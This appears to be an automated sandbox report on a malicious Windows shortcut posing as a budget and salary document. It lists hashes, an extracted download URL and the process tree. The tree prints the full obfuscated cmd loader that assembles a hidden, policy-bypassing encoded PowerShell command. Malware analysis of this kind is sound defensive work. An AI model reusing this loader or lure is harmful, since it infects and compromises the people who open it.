Analysis
-
max time kernel
0s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system -
submitted
10/01/2024, 16:07
Static task
static1
Behavioral task
behavioral1
Sample
11012024_0007_2 _ Project budget and candidate salary..lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
11012024_0007_2 _ Project budget and candidate salary..lnk
Resource
win10v2004-20231215-en
General
-
Target
11012024_0007_2 _ Project budget and candidate salary..lnk
-
Size
53KB
-
MD5
10369f2b0ad5c9899bbb48e39baeedae
-
SHA1
970fc66713a597c9059f31177ed9618472982c24
-
SHA256
d1e5ce4e97e3ca866aac57eb293c764f56eda897b7685fd689cba9cdf5505fb3
-
SHA512
ce4efa3bd1cf7752b8420b023d598ba156785b7d19303951dee845d46e6a645d2f1a93b397c3454fae51b120f7fa141c0a42c04aef6b9966e405759d39b9d8be
-
SSDEEP
192:8Tb+sFcaygd21iq2HOXt12Py86uAd+7dYkMQ776SVzFSAsQgHuCMswPaod:o9B/RtH0t12JLL+kMKbSAsN4Jyu
Malware Config
Extracted
https://thietbiytebt.online/file/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\WINDOWS\system32\cmd.exe"C:\WINDOWS\system32\cmd.exe" /c set "PPgFUZmtkv=AbQAuAEMAb" && set "YjcmcVFgoZ=AXQA6ADoAR" && set "QRtJsBiiOR=AeABjAGUAc" && set "GkAJZBOhDq=QBiADIANQB" && set "ALkNjdNfBK=yAHQAXQA6A" && set "VNGsDWhTVb=AbQBCAGEAc" && set "RXKxbkfqhl=vAHMAdAAgA" && set "HjnGgZBlnA=AeAB0AC4AR" && set "XJtmpVuiIJ=dCommand J" && set "OaJiIMrBTH=uAC4ATQBlA" && set "QyevamEWXd=DoARgByAG8" && set "jEwUUPsykQ=ABwAGYAZgB" && set "UFkFSiDFQi=F0AOgA6AEE" && set "QaCNHpiKxM=QBVAHMAZQB" && set "gjCMGJaKgT=GkAIAAkAHU" && set "GhejGyBkOH=gAC0AVQByA" && set "DwyyeUicQg=pADsACgAkA" && set "BqmtOKzDYW=wA7AAoACQA" && set "PIrQzUyyYO=AYQB5AHUAe" && set "WUPrziAeJX=2AG8AawBlA" && set "sAGdtnxnlC=AUwBDAEkAS" && set "idzKMTvvYf=AAxADUAOwA" && set "daKRujHhsB=kAGkAbgBnA" && set "WHmVSLRenB=wBuAHYAZQB" && set "RrYYYXuatS=AawBPAFQAS" && set "lMfvMWVEtu=ACgAJAHQAc" && set "cYafXCtHyh=GkAbgBnACg" && set "YcQyoddWFR=KAAkAfQAKA" && set "YXERQgHPfq=AcwBpAG4AZ" && set "mOMeLddURm=AoAJAB2AGo" && set "rRmXhTLUDU=5AHMAdABlA" && set "YkXYwAeStL=CQAYwBvAHU" && set "ftSiDTgmIp=QBlAHMAdAA" && set "YMbxSTKPwE=GwATAAyAFo" && set "lTZXiJWMFG=pAG8AbgAgA" && set "tqYpTskImO=6AFoAagBjA" && set "mdpYwJAXCT=tAGcAdAAgA" && set "nUDLgdIEhW=EQATQB5AE0" && set "JKXpIRtQsA=CQAYwBvAG4" && set "HZOEMdmekx=DAAKQAKAHs" && set "JmnBQlCASz=gA9AFsAUwB" && set "IKqmTRWUCu=QBHAGwAbAB" && set "RtaxquJvUk=QBTAHQAYQB" && set "BhIYHCgKKU=EkASQAuAEc" && set "ivJSFOaIKK=hAG8AdgAgA" && set "bLCSchhQNA=nACgAWwBTA" && set "YRMgiaXaHG=GYAdgA9AFs" && set "xZHmYCeHTR=CsAIAAkAGw" && set "qcOSoFcmlk=wAoACIAYQB" && set "mRYekWydVk=HYAZQByAHQ" && set "IkAgROUgMf=gBNAFQARQB" && set "hUgkGNeSjm=G4AZwAoACI" && set "JhtUQXHUxx=wB0AGUAbQA" && set "WymiahIMbu=jAGgACgAJA" && set "MFXyJFtbtQ=Profile -" && set "ruSMFVtxyM=0AFMAdAByA" && set "HiaCRTxPiJ=NoLogo -No" && set "bMxcIKKhum=ABlAC0ASAB" && set "mjakxtbccK=AA7AAoACQA" && set "iStAOhbOGJ=G8AawBlAC0" && set "LzfzALLTBJ=GkAbABlACg" && set "itpdLNHYRx=AcgBpAG4AZ" && set 
"yEYmzLXCwF=DYANABTAHQ" && set "BDcrUGDRnp=QBuAGMAbwB" && set "mwPbCHoooy=2ACkAOwAKA" && set "HhgsarKMcg=e hidden -" && set "PqNIUQbuZP=QBjAGEAdAB" && set "pPPvcKezJk=gBnAF0AOgA" && set "JrmWBQfadg=olicy bypa" && set "YfCUanCCOp=WindowStyl" && set "zqpUfqyzZx=AcABiAEcAV" && set "DuOONevgvc=HkAcwB0AGU" && set "iXqutAKMSo=ACQB9AAoAC" && set "lhSAFxCRUG=TAHQAcgBpA" && set "tbncZvsbWS=ABsAGEAeQB" && set "RCuwqPhkbG=QAkAGMAbwB" && set "XYrNmIjMvo=AB0AGkAbwB" && set "nbaltDiMam=ARQB4AHAAc" && set "EbEhhPfVkE=AbwBkAGkAb" && set "bErueDVSOv=gBlAHMAcwB" && set "RCdFobrarV=FoAagBaAFc" && set "PdZJUCeddm=EgATQA2AEw" && set "ZLkjVrWsdh=HkAWQBqAGg" && set "vANaxbmYJF=gB5AHsACgA" && set "rfZNSJADGW=AcgBpACAAL" && set "nFkxBIgMZd=HsACgAJAAk" && set "MqwvArAXBC=IAFIAMABjA" && set "JiLQVELhll=ABlAG0ALgB" && set "sJhltJBror=zAGEAVwA1A" && set "HOEBggqkgB=QBuAHQAIAA" && set "zksGeQVaHI=start /min" && set "lkxlCwPgXT=AeQA5ADAAY" && set "FOcsIIRFbK=H0ACgA=" && set "VTkAxyGkTW=AYwBIAE0Ad" && set "jHohvcBcrn=1AG4AdAAgA" && set "vXruNOzqeh=AUwB5AHMAd" && set "YkptWaFgqq=AWQA1AFkAV" && set "wuWpJHCYnN=AZQB0AFMAd" && set "bXCqnLXHJA=AZQAKAAkAC" && set "MuVPQvXjvm=AWwBTAHkAc" && set "xruqxCcDzm=C4ARQBuAGM" && set "rNqeSyPUsC=GwAZQBlAHA" && set "SubLdvUNPh=JAEkAbgB2A" && set "QLNSTizvBg=ExecutionP" && set "wbLYTUtUbb=ABCAGgAWQB" && set "lbrQEmeALa=APQAgACgAJ" && set "nJwpImdfYM=kAEcASgBwA" && set "jFwcEtSpnR=QAgADEAMAA" && set "VzjanMGwoc=gByAG8AbQB" && set "yswfKrOuss=6AEEAUwBDA" && set "wmTekGRueW=AUgBlAHEAd" && set "VtgPaSioJT=CAGEAcwBlA" && set "fBWgosOUtc=AJABjAG8Ad" && set "QzEfjpqWqn=G0ALgBUAGU" && set "GWAmacSQQl=AB2AGoAagB" && set "DLSRKCphUZ=UAGUAeAB0A" && set "LWVtetnChA= "" powers" && set "UmaIqzYTmz=G8AbgB0AGU" && set "qBKWATCNri=AbgB0ACAAP" && set "jVpwvJUykz=yAHQALQBTA" && set "TvgOXAhqrX=GMAUABhAHI" && set "GwgtDqHbLn=JAGIAcgBlA" && set "RnuFEuuEad=QAgAEkAbgB" && set "OVDhyglOgK=AbgB0ACAAP" && set "xCUoOlFzxP=AByAGkAbgB" && set "ffrzcCxaSP=iACkAKQA7A" && set 
"fGGwPVRfCU=CAGEAcwBpA" && set "XdPTbpVAPR=XAFoAaABPA" && set "oXYeXWaqkz=VAHcATwBEA" && set "mrSTCdEtwR=wBlADYANAB" && set "IxZpYUuvrG=QBuAEIAbgA" && set "RYLYRbungc=HUAcgBpACA" && set "GUjxyUrRts=AVwByAGkAd" && set "dtMjQXnkcn=C0AVwBlAGI" && set "FjkzPZGyyt=7AAoAdwBoA" && set "SQsAuIaaOc=JAAkAJABjA" && set "pGNCxuepcj=hell.exe -" && set "qTZUcPReMu=AagBVAHUAY" && set "NLHBMSmNoj=QB2ACIAKQA" && set "CBeKvLhjFR=AIAAtAHMAI" && set "kfAnidgwSF=GEAawA7AAo" && set "KpuWiboPKf=CQAXwAuAEU" && set "vUwpwZEbez=HMAcwBhAGc" && set "miNDfDAYwk=AdABlAG4Ad" && set "AtYmadsJpQ=1AHgAcABmA" && set "eiHVmRytUW=C0APQAgADE" && set "UZOzANzDdG=uAEMAbwBuA" && set "AZjZYBTkSe=GUAWABSAGw" && set "xQOvjPVoMl=AagBhAG8Ad" && set "LzIajGywmW=QAuAEcAZQB" && set "OKRtPTAaYG=AOwAKAAkAC" && set "BuZHTeNMQd=AWQBuAFEAd" && set "QNteCcjIJv=ss -Encode" && set "SYgdTFUUGe=QAxAE4ARAB" && call %zksGeQVaHI%%LWVtetnChA%%pGNCxuepcj%%YfCUanCCOp%%HhgsarKMcg%%HiaCRTxPiJ%%MFXyJFtbtQ%%QLNSTizvBg%%JrmWBQfadg%%QNteCcjIJv%%XJtmpVuiIJ%%tbncZvsbWS%%AtYmadsJpQ%%YRMgiaXaHG%%vXruNOzqeh%%JiLQVELhll%%DLSRKCphUZ%%xruqxCcDzm%%EbEhhPfVkE%%pPPvcKezJk%%yswfKrOuss%%BhIYHCgKKU%%wuWpJHCYnN%%xCUoOlFzxP%%bLCSchhQNA%%DuOONevgvc%%PPgFUZmtkv%%WHmVSLRenB%%ALkNjdNfBK%%QyevamEWXd%%VNGsDWhTVb%%mrSTCdEtwR%%lhSAFxCRUG%%hUgkGNeSjm%%VTkAxyGkTW%%IkAgROUgMf%%tqYpTskImO%%ZLkjVrWsdh%%RrYYYXuatS%%SYgdTFUUGe%%oXYeXWaqkz%%RCdFobrarV%%YkptWaFgqq%%wbLYTUtUbb%%XdPTbpVAPR%%nUDLgdIEhW%%qTZUcPReMu%%IxZpYUuvrG%%ffrzcCxaSP%%mOMeLddURm%%xQOvjPVoMl%%JmnBQlCASz%%rRmXhTLUDU%%QzEfjpqWqn%%HjnGgZBlnA%%BDcrUGDRnp%%daKRujHhsB%%UFkFSiDFQi%%sAGdtnxnlC%%LzIajGywmW%%ruSMFVtxyM%%cYafXCtHyh%%MuVPQvXjvm%%JhtUQXHUxx%%UZOzANzDdG%%mRYekWydVk%%YjcmcVFgoZ%%VzjanMGwoc%%VtgPaSioJT%%yEYmzLXCwF%%itpdLNHYRx%%qcOSoFcmlk%%MqwvArAXBC%%PdZJUCeddm%%lkxlCwPgXT%%IKqmTRWUCu%%nJwpImdfYM%%AZjZYBTkSe%%BuZHTeNMQd%%GkAJZBOhDq%%sJhltJBror%%YMbxSTKPwE%%zqpUfqyzZx%%NLHBMSmNoj%%DwyyeUicQg%%RYLYRbungc%%lbrQEmeALa%%GWAmacSQQl%%ivJSFOaIKK%%xZHmYCeHTR%%PIrQzUyyYO%%jEwUUPsykQ%%mwPbCHoooy%%YkXYwAeStL%%qB
KWATCNri%%jFwcEtSpnR%%FjkzPZGyyt%%LzfzALLTBJ%%fBWgosOUtc%%HOEBggqkgB%%mdpYwJAXCT%%HZOEMdmekx%%lMfvMWVEtu%%vANaxbmYJF%%SQsAuIaaOc%%UmaIqzYTmz%%OVDhyglOgK%%RnuFEuuEad%%WUPrziAeJX%%dtMjQXnkcn%%wmTekGRueW%%ftSiDTgmIp%%GhejGyBkOH%%gjCMGJaKgT%%rfZNSJADGW%%QaCNHpiKxM%%fGGwPVRfCU%%TvgOXAhqrX%%YXERQgHPfq%%BqmtOKzDYW%%SubLdvUNPh%%iStAOhbOGJ%%nbaltDiMam%%bErueDVSOv%%lTZXiJWMFG%%JKXpIRtQsA%%miNDfDAYwk%%mjakxtbccK%%GwgtDqHbLn%%kfAnidgwSF%%iXqutAKMSo%%PqNIUQbuZP%%WymiahIMbu%%nFkxBIgMZd%%GUjxyUrRts%%bMxcIKKhum%%RXKxbkfqhl%%KpuWiboPKf%%QRtJsBiiOR%%XYrNmIjMvo%%OaJiIMrBTH%%vUwpwZEbez%%bXCqnLXHJA%%RCuwqPhkbG%%jHohvcBcrn%%eiHVmRytUW%%OKRtPTAaYG%%RtaxquJvUk%%jVpwvJUykz%%rNqeSyPUsC%%CBeKvLhjFR%%idzKMTvvYf%%YcQyoddWFR%%FOcsIIRFbK%1⤵PID:2980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 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2⤵PID:2180
-
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\11012024_0007_2 _ Project budget and candidate salary..lnk"1⤵PID:2932